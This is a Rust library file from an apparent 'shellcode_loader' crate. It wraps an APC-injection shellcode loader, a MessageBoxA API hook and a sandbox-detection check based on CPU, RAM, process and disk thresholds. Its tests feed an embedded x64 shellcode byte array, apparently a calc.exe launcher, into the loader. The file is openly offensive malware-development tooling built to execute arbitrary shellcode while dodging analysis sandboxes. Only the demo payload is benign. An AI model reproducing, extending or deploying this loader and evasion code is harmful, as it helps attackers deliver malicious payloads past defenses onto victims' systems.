shellcode_loader/
lib.rs

1mod hook{
2    pub(crate) mod message_box_a_hook;
3}
4
5mod loader{
6    pub(crate) mod apc;
7}
8
9pub mod loader_apc{
10    use crate::loader::apc;
11    pub fn apc(buf:&[u8]){
12        let _=apc::apc(&buf);
13    }
14}
15
16pub mod hook_message_box_a_hook{
17    use crate::hook::message_box_a_hook::{message_box_hook};
18    pub fn hook_message_box_a_hook(callback:fn()){
19        let _=message_box_hook(callback);
20    }
21}
22
23mod sandbox;
24
25#[cfg(test)]
26mod tests{
27    use crate::{hook_message_box_a_hook::hook_message_box_a_hook, loader_apc::apc, sandbox::is_sandbox};
28    #[test]
29    pub fn test_loader_apc(){
30        let buf: [u8; 276] = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,
31        0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,
32        0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,
33        0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,
34        0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,
35        0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,
36        0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,
37        0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,
38        0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
39        0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
40        0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,
41        0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,
42        0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,
43        0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,
44        0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,
45        0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,
46        0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,
47        0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,
48        0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,
49        0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,
50        0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,
51        0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,
52        0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,
53        0x2e,0x65,0x78,0x65,0x00];
54        let _=apc(&buf);
55    }
56
57    #[test]
58    pub fn test_hook_message_box_a_hook(){
59        fn hello(){
60            //你自己定义的任意函数
61            println!("hello hook!");
62        }
63
64        hook_message_box_a_hook(hello);
65    }
66
67    #[test]
68    pub fn test_is_sandbox(){
69        //自定义四个常数,当目标系统的某个值小于自定义的常数时,判定为沙箱环境
70        const MAX_CPU_COUNT:u32=4;
71        const MAX_RAM_SIZE:u32=8;
72        const MAX_PROCESS_COUNT:u32=100;
73        const MAX_DISK_SIZE:u32=60;
74
75        println!("isSandbox?{}!",is_sandbox(MAX_CPU_COUNT, MAX_RAM_SIZE, MAX_PROCESS_COUNT, MAX_DISK_SIZE));
76    }
77}